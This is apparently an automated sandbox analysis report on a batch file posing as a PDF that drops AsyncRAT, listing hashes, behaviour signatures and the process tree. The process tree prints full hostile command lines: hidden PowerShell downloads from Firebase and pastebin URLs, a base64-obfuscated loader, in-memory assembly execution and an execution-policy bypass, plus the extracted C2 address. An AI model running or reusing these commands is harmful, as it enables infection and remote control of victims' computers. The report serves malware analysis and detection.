Analysis

  • max time kernel
    148s
  • max time network
    303s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-es
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240709-es, locale:es-es, os:windows10-2004-x64, system, windows
  • submitted
    23-07-2024 17:20

General

  • Target

    fv645458456550656894659461646_Pdf.bat

  • Size

    28KB

  • MD5

    54c9e929aa6ea3e1e5957f9b0aee4e69

  • SHA1

    2c6e7d48b6951f59c4fcddfeb65b0e07e96394ac

  • SHA256

    c210d65973ad42a433a440c7716e92631c14ea6614f628ed0c540fae3b54e991

  • SHA512

    a075910c9707f49a9ffa6673ab2eb29ff3e0c2cabbb521ad7101c999f50bc7bd75b6e49eaa8d7f3d9db109c06bdbb56980b46317a23ed5d7d87dcacdd0e1ce2b

  • SSDEEP

    12:3xzJZ+O2P5g0it981k771o3tkRXFOuHeTgQ1tgQzu0:3x2P5g0i/7ZetYV7QEQzu0

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    exe.dropper
    https://firebasestorage.googleapis.com/v0/b/documentos-1b4a9.appspot.com/o/2207.vbs?alt=media&token=29f70419-a771-4403-90c3-30dc64c96114

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper
    http://pastebin.com/raw/V9y5Q5vv

Extracted

  • Family
    asyncrat
  • Version
    | CRACKED BY https://t.me/xworm_v2
  • Botnet
    Default
  • C2
    asyn8097.duckdns.org:8097
  • Mutex
    AsyncMutex_6SI8OkPnk
  • Attributes
    • delay
      3
    • install
      false
    • install_folder
      %AppData%
  • aes.plain

Signatures

  • AsyncRat

    AsyncRAT, written in C#, is designed to remotely monitor and control other computers.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Runs PowerShell with a hidden display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely as a geofence check.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fv645458456550656894659461646_Pdf.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://firebasestorage.googleapis.com/v0/b/documentos-1b4a9.appspot.com/o/2207.vbs?alt=media&token=29f70419-a771-4403-90c3-30dc64c96114', 'C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2100
    • C:\Windows\system32\wscript.exe
      wscript "C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1372
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J☼B2☼HU☼dQBj☼HQ☼I☼☼9☼C☼☼Jw☼w☼DE☼Jw☼7☼CQ☼dQB0☼Gc☼awBu☼C☼☼PQ☼g☼Cc☼JQBw☼Ho☼QQBj☼E8☼ZwBJ☼G4☼TQBy☼CU☼Jw☼7☼Fs☼UwB5☼HM☼d☼Bl☼G0☼LgBO☼GU☼d☼☼u☼FM☼ZQBy☼HY☼aQBj☼GU☼U☼Bv☼Gk☼bgB0☼E0☼YQBu☼GE☼ZwBl☼HI☼XQ☼6☼Do☼UwBl☼HI☼dgBl☼HI☼QwBl☼HI☼d☼Bp☼GY☼aQBj☼GE☼d☼Bl☼FY☼YQBs☼Gk☼Z☼Bh☼HQ☼aQBv☼G4☼QwBh☼Gw☼b☼Bi☼GE☼YwBr☼C☼☼PQ☼g☼Hs☼J☼B0☼HI☼dQBl☼H0☼OwBb☼FM☼eQBz☼HQ☼ZQBt☼C4☼TgBl☼HQ☼LgBT☼GU☼cgB2☼Gk☼YwBl☼F☼☼bwBp☼G4☼d☼BN☼GE☼bgBh☼Gc☼ZQBy☼F0☼Og☼6☼FM☼ZQBj☼HU☼cgBp☼HQ☼eQBQ☼HI☼bwB0☼G8☼YwBv☼Gw☼I☼☼9☼C☼☼WwBT☼Hk☼cwB0☼GU☼bQ☼u☼E4☼ZQB0☼C4☼UwBl☼GM☼dQBy☼Gk☼d☼B5☼F☼☼cgBv☼HQ☼bwBj☼G8☼b☼BU☼Hk☼c☼Bl☼F0☼Og☼6☼FQ☼b☼Bz☼DE☼Mg☼7☼Fs☼QgB5☼HQ☼ZQBb☼F0☼XQ☼g☼CQ☼dgBx☼GE☼dQBx☼C☼☼PQ☼g☼Fs☼cwB5☼HM☼d☼Bl☼G0☼LgBD☼G8☼bgB2☼GU☼cgB0☼F0☼Og☼6☼EY☼cgBv☼G0☼QgBh☼HM☼ZQ☼2☼DQ☼UwB0☼HI☼aQBu☼Gc☼K☼☼g☼Cg☼TgBl☼Hc☼LQBP☼GI☼agBl☼GM☼d☼☼g☼E4☼ZQB0☼C4☼VwBl☼GI☼QwBs☼Gk☼ZQBu☼HQ☼KQ☼u☼EQ☼bwB3☼G4☼b☼Bv☼GE☼Z☼BT☼HQ☼cgBp☼G4☼Zw☼o☼C☼☼K☼BO☼GU☼dw☼t☼E8☼YgBq☼GU☼YwB0☼C☼☼TgBl☼HQ☼LgBX☼GU☼YgBD☼Gw☼aQBl☼G4☼d☼☼p☼C4☼R☼Bv☼Hc☼bgBs☼G8☼YQBk☼FM☼d☼By☼Gk☼bgBn☼Cg☼JwBo☼HQ☼d☼Bw☼Do☼Lw☼v☼H☼☼YQBz☼HQ☼ZQBi☼Gk☼bg☼u☼GM☼bwBt☼C8☼cgBh☼Hc☼LwBW☼Dk☼eQ☼1☼FE☼NQB2☼HY☼Jw☼p☼C☼☼KQ☼g☼Ck☼OwBb☼HM☼eQBz☼HQ☼ZQBt☼C4☼QQBw☼H☼☼R☼Bv☼G0☼YQBp☼G4☼XQ☼6☼Do☼QwB1☼HI☼cgBl☼G4☼d☼BE☼G8☼bQBh☼Gk☼bg☼u☼Ew☼bwBh☼GQ☼K☼☼k☼HY☼cQBh☼HU☼cQ☼p☼C4☼RwBl☼HQ☼V☼B5☼H☼☼ZQ☼o☼Cc☼QwBs☼GE☼cwBz☼Ew☼aQBi☼HI☼YQBy☼Hk☼Mw☼u☼EM☼b☼Bh☼HM☼cw☼x☼Cc☼KQ☼u☼Ec☼ZQB0☼E0☼ZQB0☼Gg☼bwBk☼Cg☼JwBN☼HM☼cQBC☼Ek☼YgBZ☼Cc☼KQ☼u☼Ek☼bgB2☼G8☼awBl☼Cg☼J☼Bu☼HU☼b☼Bs☼Cw☼I☼Bb☼G8☼YgBq☼GU☼YwB0☼Fs☼XQBd☼C☼☼K☼☼n☼DY☼N☼Bh☼DE☼ZQBm☼DQ☼M☼Bh☼GE☼YgBk☼C0☼YQBh☼GY☼O☼☼t☼DE☼MgBm☼DQ☼LQBj☼Dc☼Zg☼2☼C0☼N☼Bj☼DI☼NwBj☼DM☼Mg☼1☼D0☼bgBl☼Gs☼bwB0☼CY☼YQBp☼GQ☼ZQBt☼D0☼d☼Bs☼GE☼PwB0☼Hg☼d☼☼u☼E4☼WQBT☼EE☼LwBv☼C8☼bQBv☼GM☼LgB0☼G8☼c☼Bz☼H☼☼c☼Bh☼C4☼OQBh☼DQ☼Yg☼x☼C0☼cwBv☼HQ☼bgBl☼G0☼dQBj☼G8☼Z☼☼v☼GI☼Lw☼w☼HY☼LwBt☼G8☼Yw☼u☼HM☼aQBw☼GE☼ZQBs☼Gc☼bwBv☼Gc☼LgBl☼Gc☼YQBy☼G8☼d☼Bz☼GU☼cwBh☼GI☼ZQBy☼Gk☼Zg☼v☼C8☼OgBz☼H☼☼d☼B0☼Gg☼Jw☼g☼Cw☼I☼☼k☼HU☼d☼Bn☼Gs☼bg☼g☼Cw☼I☼☼n☼F8☼XwBf☼F8☼XwBf☼F8☼XwBp☼Hk☼YgBi☼HU☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼
LQ☼t☼C0☼LQ☼t☼C0☼LQ☼n☼Cw☼I☼☼k☼HY☼dQB1☼GM☼d☼☼s☼C☼☼Jw☼x☼Cc☼L☼☼g☼Cc☼UgBv☼GQ☼YQ☼n☼C☼☼KQ☼p☼Ds☼';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace('☼','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs');powershell -command $KByHL;
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4804
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$vuuct = '01';$utgkn = 'C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $vqauq = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($vqauq).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('64a1ef40aabd-aaf8-12f4-c7f6-4c27c325=nekot&aidem=tla?txt.NYSA/o/moc.topsppa.9a4b1-sotnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $utgkn , '________iybbu____________________________________-------', $vuuct, '1', 'Roda' ));"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1568
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4052
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3644
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1464
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            5⤵
            PID:784
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:984

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      08f9f3eb63ff567d1ee2a25e9bbf18f0

      SHA1

      6bf06056d1bb14c183490caf950e29ac9d73643a

      SHA256

      82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

      SHA512

      425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      50c200ee95fde62de06d24c46d7f4015

      SHA1

      1a92b50e45b5a1e38b2e6e44b31a261d6e94c51f

      SHA256

      08f235da5be274937370937f5cb665bbc521424cd935661c3a1de572c8880c1f

      SHA512

      1cc2f6c15f60d810462410b889cb57f44d6be0cdef5ccd997bbb605918d7df046c0193bac1df91b5ffe272ee4f456a4b19ff5c998c42241d0673c023358c49e8

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      c6e7e5342ea5ff4e820aa7185e18cb00

      SHA1

      5b0909c5d951389edbfb7129e3fb9e4e2a822b14

      SHA256

      4eea204c7a249f11b31a7a52ef3e1f32ac743d14c52cdce7f8494e10cf4457a7

      SHA512

      25e13c61e262ec4032af7737126928920b2a191dfce22936e1e3a3d229b48617248698c9e0b362864a3d3b5e54abad91728e6d68077e8227703a02660875e8a5

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      ce53a01aa4e625799ddce5aea12dc6a7

      SHA1

      54155939e8b8af62fb3ef78944a55826e3ecd917

      SHA256

      c33f1c987bfc37cef5961e85f2020f181213442342591b40caa98493d3377315

      SHA512

      7e81b075fe04a6a65904771941d22fe84492a4bb0eb48c67b2af8b3ee1516358e55d3ec2c1269340a55cc6326821d0d60568d6057b4088a4258c36fe00c8d86f

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      e3324f3c0f10a96ce82da88885030e92

      SHA1

      d21a65befdf3fd9dc16c362f39bdfdc2f331cf82

      SHA256

      816814e23f89922feea4900759738962760ae600f69e1cfe35e623f7502f3689

      SHA512

      2d0df3b4f5d71bfd2205712d3a06841541d775008958caacd94c92017a04ab0b08fcccb7ad1ea3aa7307529216e88612da3098a06d8de0b176abac1a082246f5

    • C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs

      Filesize

      1.7MB

      MD5

      a958447eb04bdb5f4ecf9ff291884946

      SHA1

      4d5ffda96a16ba7d0df252521ddde378ae6665a7

      SHA256

      aa05cb9b41c6799452c75ce1ec9a6ae20258b6aadbe1a98d7aac234abb188723

      SHA512

      c1f2fc24f33b238a9e3a5f22b3b4e69103b9eda9fff8d8a14984a5754a5c8a231eeb8f5d859563d70eef0aead1cf032c64161bbc143cf39956b4968307b944b3

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_crzznrzk.nfn.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\xx1.ps1

      Filesize

      285B

      MD5

      43e71ea1d73d91da070fedd7f1a79998

      SHA1

      d7f3de14ea18eb354188326c9e6483160169c4bc

      SHA256

      f56faa81140b0b2ccdc137a98c84ac9a5c74492a2b5cbd825d8cafa37d2f1ed6

      SHA512

      3e6ff260759be20491a015d5ec45de620d1dd4290700bd0b5aa84e8e985568afa21430c31d2920b02f8e19dc1fe7700536541d83fdc38f6876e0b20cbfb04b56

    • memory/984-93-0x00000000065B0000-0x0000000006B54000-memory.dmp

      Filesize

      5.6MB

    • memory/984-92-0x0000000005AA0000-0x0000000005B3C000-memory.dmp

      Filesize

      624KB

    • memory/984-83-0x0000000000400000-0x0000000000416000-memory.dmp

      Filesize

      88KB

    • memory/984-94-0x0000000006070000-0x00000000060D6000-memory.dmp

      Filesize

      408KB

    • memory/984-95-0x0000000006300000-0x0000000006402000-memory.dmp

      Filesize

      1.0MB

    • memory/1464-65-0x0000017C60AC0000-0x0000017C60CDC000-memory.dmp

      Filesize

      2.1MB

    • memory/1568-86-0x0000026765D90000-0x0000026765FAC000-memory.dmp

      Filesize

      2.1MB

    • memory/1568-41-0x0000026765BD0000-0x0000026765BEE000-memory.dmp

      Filesize

      120KB

    • memory/1568-42-0x0000026765BF0000-0x0000026765BF6000-memory.dmp

      Filesize

      24KB

    • memory/1568-82-0x0000026766130000-0x000002676613A000-memory.dmp

      Filesize

      40KB

    • memory/2100-15-0x00007FFC9D830000-0x00007FFC9E2F1000-memory.dmp

      Filesize

      10.8MB

    • memory/2100-19-0x00007FFC9D830000-0x00007FFC9E2F1000-memory.dmp

      Filesize

      10.8MB

    • memory/2100-0-0x00007FFC9D833000-0x00007FFC9D835000-memory.dmp

      Filesize

      8KB

    • memory/2100-14-0x000001747AEE0000-0x000001747AFE2000-memory.dmp

      Filesize

      1.0MB

    • memory/2100-13-0x00007FFC9D830000-0x00007FFC9E2F1000-memory.dmp

      Filesize

      10.8MB

    • memory/2100-12-0x000001747A1D0000-0x000001747A1E0000-memory.dmp

      Filesize

      64KB

    • memory/2100-1-0x000001747A390000-0x000001747A412000-memory.dmp

      Filesize

      520KB

    • memory/2100-2-0x000001747A1E0000-0x000001747A202000-memory.dmp

      Filesize

      136KB

    • memory/3644-78-0x000001E5DC5E0000-0x000001E5DC7FC000-memory.dmp

      Filesize

      2.1MB

    • memory/4052-81-0x000001DFEE3A0000-0x000001DFEE5BC000-memory.dmp

      Filesize

      2.1MB

    • memory/4052-63-0x000001DFEE280000-0x000001DFEE28A000-memory.dmp

      Filesize

      40KB

    • memory/4804-89-0x000001D098810000-0x000001D098A2C000-memory.dmp

      Filesize

      2.1MB